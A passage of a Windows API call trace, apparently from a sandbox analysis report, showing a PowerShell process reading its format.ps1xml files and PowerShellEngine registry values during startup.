	[0666.604] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d260 | out: lpFileInformation=0x26d260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0666.604] SetErrorMode (uMode=0x1) returned 0x1
	[0666.604] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26d050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0666.604] SetErrorMode (uMode=0x1) returned 0x1
	[0666.604] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d260 | out: lpFileInformation=0x26d260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0666.604] SetErrorMode (uMode=0x1) returned 0x1
	[0666.604] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26d050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0666.604] SetErrorMode (uMode=0x1) returned 0x1
	[0666.604] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d260 | out: lpFileInformation=0x26d260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0666.605] SetErrorMode (uMode=0x1) returned 0x1
	[0666.606] CoTaskMemAlloc (cb=0x104) returned 0x139d70
	[0666.606] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x139d70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0666.606] CoTaskMemFree (pv=0x139d70) 
	[0666.619] CoTaskMemAlloc (cb=0x104) returned 0x139d70
	[0666.619] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x139d70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0666.619] CoTaskMemFree (pv=0x139d70) 
	[0666.620] CoTaskMemAlloc (cb=0x104) returned 0x139d70
	[0666.620] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x139d70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0666.620] CoTaskMemFree (pv=0x139d70) 
	[0666.622] CoTaskMemAlloc (cb=0x104) returned 0x139d70
	[0666.622] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x139d70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0666.622] CoTaskMemFree (pv=0x139d70) 
	[0666.623] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x26c970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0666.624] SetErrorMode (uMode=0x1) returned 0x1
	[0666.624] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x310
	[0666.624] GetFileType (hFile=0x310) returned 0x1
	[0666.624] SetErrorMode (uMode=0x1) returned 0x1
	[0666.624] GetFileType (hFile=0x310) returned 0x1
	[0666.624] ReadFile (in: hFile=0x310, lpBuffer=0x33e5be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x33e5be0*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0666.626] ReadFile (in: hFile=0x310, lpBuffer=0x33e5be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x33e5be0*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0666.627] ReadFile (in: hFile=0x310, lpBuffer=0x33e5be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x33e5be0*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0666.627] ReadFile (in: hFile=0x310, lpBuffer=0x33e5be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x33e5be0*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0668.251] ReadFile (in: hFile=0x310, lpBuffer=0x33e5be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x33e5be0*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0668.376] ReadFile (in: hFile=0x310, lpBuffer=0x33e5be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x33e5be0*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0668.376] ReadFile (in: hFile=0x310, lpBuffer=0x33e5be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x33e5be0*, lpNumberOfBytesRead=0x26cef8*=0x9e2, lpOverlapped=0x0) returned 1
	[0668.376] ReadFile (in: hFile=0x310, lpBuffer=0x33e512a, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x33e512a*, lpNumberOfBytesRead=0x26cef8*=0x0, lpOverlapped=0x0) returned 1
	[0668.376] ReadFile (in: hFile=0x310, lpBuffer=0x33e5be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x33e5be0*, lpNumberOfBytesRead=0x26cef8*=0x0, lpOverlapped=0x0) returned 1
	[0668.376] CloseHandle (hObject=0x310) returned 1
	[0668.377] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0668.377] SetErrorMode (uMode=0x1) returned 0x1
	[0668.377] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26cea0 | out: lpFileInformation=0x26cea0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0668.377] SetErrorMode (uMode=0x1) returned 0x1
	[0668.377] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0668.377] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26cf88 | out: phkResult=0x26cf88*=0x310) returned 0x0
	[0668.377] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26cf0c, lpData=0x0, lpcbData=0x26cf08*=0x0 | out: lpType=0x26cf0c*=0x1, lpData=0x0, lpcbData=0x26cf08*=0x56) returned 0x0
	[0668.377] CoTaskMemAlloc (cb=0x5a) returned 0x1b863890
	[0668.377] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26cedc, lpData=0x1b863890, lpcbData=0x26ced8*=0x56 | out: lpType=0x26cedc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26ced8*=0x56) returned 0x0
	[0668.378] CoTaskMemFree (pv=0x1b863890) 
	[0668.378] RegCloseKey (hKey=0x310) returned 0x0
	[0668.378] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0668.378] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x26ca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0668.388] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x5ae0d6e9, Data2=0xbaaa, Data3=0x4369, Data4=([0]=0x80, [1]=0xc4, [2]=0x9, [3]=0x9a, [4]=0x28, [5]=0x9, [6]=0xf7, [7]=0xd2))) returned 0x0
	[0668.403] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x303be78d, Data2=0xb172, Data3=0x4727, Data4=([0]=0xb0, [1]=0xbe, [2]=0x42, [3]=0x4b, [4]=0x7a, [5]=0x99, [6]=0x4e, [7]=0x4a))) returned 0x0
	[0668.405] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x310
	[0668.405] GetFileType (hFile=0x310) returned 0x1
	[0668.405] SetErrorMode (uMode=0x1) returned 0x1
	[0668.405] GetFileType (hFile=0x310) returned 0x1
	[0668.405] ReadFile (in: hFile=0x310, lpBuffer=0x3410748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x3410748*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0668.407] ReadFile (in: hFile=0x310, lpBuffer=0x3410748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x3410748*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0668.407] ReadFile (in: hFile=0x310, lpBuffer=0x3410748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x3410748*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0668.425] ReadFile (in: hFile=0x310, lpBuffer=0x3410748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x3410748*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0668.425] ReadFile (in: hFile=0x310, lpBuffer=0x3410748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x3410748*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0668.426] ReadFile (in: hFile=0x310, lpBuffer=0x3410748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x3410748*, lpNumberOfBytesRead=0x26cef8*=0xfb2, lpOverlapped=0x0) returned 1
	[0668.427] ReadFile (in: hFile=0x310, lpBuffer=0x340fe62, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x340fe62*, lpNumberOfBytesRead=0x26cef8*=0x0, lpOverlapped=0x0) returned 1
	[0668.427] ReadFile (in: hFile=0x310, lpBuffer=0x3410748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x3410748*, lpNumberOfBytesRead=0x26cef8*=0x0, lpOverlapped=0x0) returned 1
	[0668.427] CloseHandle (hObject=0x310) returned 1
	[0668.427] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0668.427] SetErrorMode (uMode=0x1) returned 0x1
	[0668.427] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26cea0 | out: lpFileInformation=0x26cea0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0668.427] SetErrorMode (uMode=0x1) returned 0x1
	[0668.427] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0668.428] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26cf88 | out: phkResult=0x26cf88*=0x310) returned 0x0
	[0668.428] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26cf0c, lpData=0x0, lpcbData=0x26cf08*=0x0 | out: lpType=0x26cf0c*=0x1, lpData=0x0, lpcbData=0x26cf08*=0x56) returned 0x0
	[0668.428] CoTaskMemAlloc (cb=0x5a) returned 0x1b863890
	[0668.428] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26cedc, lpData=0x1b863890, lpcbData=0x26ced8*=0x56 | out: lpType=0x26cedc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26ced8*=0x56) returned 0x0
	[0668.428] CoTaskMemFree (pv=0x1b863890) 
	[0668.428] RegCloseKey (hKey=0x310) returned 0x0
	[0668.428] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0668.429] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26ca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0668.431] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x33a4fcea, Data2=0x1421, Data3=0x4920, Data4=([0]=0x9e, [1]=0xdc, [2]=0x64, [3]=0xa, [4]=0x2b, [5]=0x3d, [6]=0x71, [7]=0x6f))) returned 0x0
	[0668.433] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x151874f5, Data2=0x4290, Data3=0x4f23, Data4=([0]=0xb8, [1]=0x7f, [2]=0x24, [3]=0x10, [4]=0x2b, [5]=0x56, [6]=0xa7, [7]=0xec))) returned 0x0
	[0668.434] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x69eaed6, Data2=0x947e, Data3=0x496b, Data4=([0]=0xb5, [1]=0xa3, [2]=0x2, [3]=0x37, [4]=0xdf, [5]=0x20, [6]=0x33, [7]=0x2d))) returned 0x0
	[0668.434] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x86d0edd9, Data2=0x1f9f, Data3=0x45d7, Data4=([0]=0x8c, [1]=0x88, [2]=0x8, [3]=0x6a, [4]=0x56, [5]=0xad, [6]=0xa5, [7]=0xcb))) returned 0x0
	[0668.434] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x495913dc, Data2=0x1866, Data3=0x432c, Data4=([0]=0xbe, [1]=0x15, [2]=0x86, [3]=0xda, [4]=0x28, [5]=0xa0, [6]=0xd8, [7]=0x6e))) returned 0x0
	[0668.435] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x578475c1, Data2=0xa433, Data3=0x4da8, Data4=([0]=0xbe, [1]=0xf, [2]=0xd8, [3]=0x73, [4]=0x84, [5]=0x69, [6]=0xb7, [7]=0x17))) returned 0x0
	[0668.435] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x310
	[0668.435] GetFileType (hFile=0x310) returned 0x1
	[0668.435] SetErrorMode (uMode=0x1) returned 0x1
	[0668.435] GetFileType (hFile=0x310) returned 0x1
	[0668.435] ReadFile (in: hFile=0x310, lpBuffer=0x345c4a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x345c4a8*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0668.437] ReadFile (in: hFile=0x310, lpBuffer=0x345c4a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x345c4a8*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0668.438] ReadFile (in: hFile=0x310, lpBuffer=0x345c4a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x345c4a8*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0668.438] ReadFile (in: hFile=0x310, lpBuffer=0x345c4a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x345c4a8*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0668.439] ReadFile (in: hFile=0x310, lpBuffer=0x345c4a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x345c4a8*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0668.440] ReadFile (in: hFile=0x310, lpBuffer=0x345c4a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x345c4a8*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0668.440] ReadFile (in: hFile=0x310, lpBuffer=0x345c4a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x345c4a8*, lpNumberOfBytesRead=0x26cef8*=0xaca, lpOverlapped=0x0) returned 1
	[0668.440] ReadFile (in: hFile=0x310, lpBuffer=0x345bada, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x345bada*, lpNumberOfBytesRead=0x26cef8*=0x0, lpOverlapped=0x0) returned 1
	[0668.440] ReadFile (in: hFile=0x310, lpBuffer=0x345c4a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x345c4a8*, lpNumberOfBytesRead=0x26cef8*=0x0, lpOverlapped=0x0) returned 1
	[0668.440] CloseHandle (hObject=0x310) returned 1
	[0668.441] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0668.441] SetErrorMode (uMode=0x1) returned 0x1
	[0668.441] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26cea0 | out: lpFileInformation=0x26cea0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0668.441] SetErrorMode (uMode=0x1) returned 0x1
	[0668.441] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0668.442] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26cf88 | out: phkResult=0x26cf88*=0x310) returned 0x0
	[0668.442] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26cf0c, lpData=0x0, lpcbData=0x26cf08*=0x0 | out: lpType=0x26cf0c*=0x1, lpData=0x0, lpcbData=0x26cf08*=0x56) returned 0x0
	[0668.442] CoTaskMemAlloc (cb=0x5a) returned 0x1b863890
	[0668.442] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26cedc, lpData=0x1b863890, lpcbData=0x26ced8*=0x56 | out: lpType=0x26cedc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26ced8*=0x56) returned 0x0
	[0668.442] CoTaskMemFree (pv=0x1b863890) 
	[0668.442] RegCloseKey (hKey=0x310) returned 0x0
	[0668.442] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0668.442] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26ca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0668.453] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x26c410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0670.255] VirtualQuery (in: lpAddress=0x26ba20, lpBuffer=0x26c8e0, dwLength=0x30 | out: lpBuffer=0x26c8e0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0670.256] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x4f461fa5, Data2=0x4b47, Data3=0x44f1, Data4=([0]=0x86, [1]=0x9e, [2]=0x1f, [3]=0x2e, [4]=0x94, [5]=0xc5, [6]=0xc2, [7]=0xdc))) returned 0x0
	[0671.631] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x7ea48878, Data2=0x9e6, Data3=0x447f, Data4=([0]=0x9f, [1]=0x87, [2]=0x3a, [3]=0xbe, [4]=0x3, [5]=0x5b, [6]=0xe9, [7]=0xf6))) returned 0x0
	[0671.631] VirtualQuery (in: lpAddress=0x26bbd0, lpBuffer=0x26ca90, dwLength=0x30 | out: lpBuffer=0x26ca90*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0671.632] VirtualQuery (in: lpAddress=0x26bbd0, lpBuffer=0x26ca90, dwLength=0x30 | out: lpBuffer=0x26ca90*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0671.633] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0xac9c8b2a, Data2=0x6d8a, Data3=0x48bd, Data4=([0]=0x94, [1]=0x8d, [2]=0x7e, [3]=0x9b, [4]=0x14, [5]=0x93, [6]=0x58, [7]=0xba))) returned 0x0
	[0671.636] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x4f0cc152, Data2=0x7f52, Data3=0x431f, Data4=([0]=0xbc, [1]=0x93, [2]=0xd, [3]=0xf0, [4]=0x69, [5]=0x16, [6]=0x68, [7]=0x72))) returned 0x0
	[0671.637] VirtualQuery (in: lpAddress=0x26be20, lpBuffer=0x26cce0, dwLength=0x30 | out: lpBuffer=0x26cce0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
